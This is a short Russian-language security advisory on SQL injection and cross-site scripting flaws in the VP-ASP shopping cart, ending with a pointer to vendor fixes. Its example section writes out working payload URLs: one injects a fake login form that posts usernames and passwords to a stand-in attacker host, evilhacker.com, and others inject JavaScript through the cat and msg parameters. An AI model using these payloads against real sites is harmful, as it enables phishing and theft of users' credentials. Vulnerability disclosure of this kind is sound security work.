SQL-инъекция и XSS в VP-ASP

Описание: Обнаружены SQL-инъекция и межсайтовое выполнение сценариев в VP-ASP. Удаленный атакующий может получить доступ к важной информации на сервере.

1. Удаленный атакующий может выполнить SQL сценарий с помощью специально сформированного POST запроса.
2. Удаленный атакующий может получить доступ к важным данным пользователей.

Пример/Эксплоит:
1. Пример реализации атаки "phishing":
http://[VICTIM]/vpasp/shopdisplayproduct s.asp?id=5&cat=<form%20action="http:
//www.evilhacker.com/save2db.asp"%20method="post">Username:<input%20name="us
ername"%20type="text"%20maxlength="30"><br>Password:<i nput%20name="password"
%20type="text"%20maxlength="30"><br><input%20name="login"%20type="submit"%20
value="Login"></form>

2. Пример реализации XSS:
http://[VICTIM]/vpasp/shopdisplayproducts.asp?id=5&cat=<img%20src="javasc ript:alert('XSS')">
http://[VICTIM]/vpasp/shoperror.asp?msg=<img%20src="javascript:alert('XSS')">

URL производителя:http://www.vpasp.com

Решение: Установите обновления с сайта производителя: http://www.vpasp.com/virtprog/info/faq_securityfixes.htm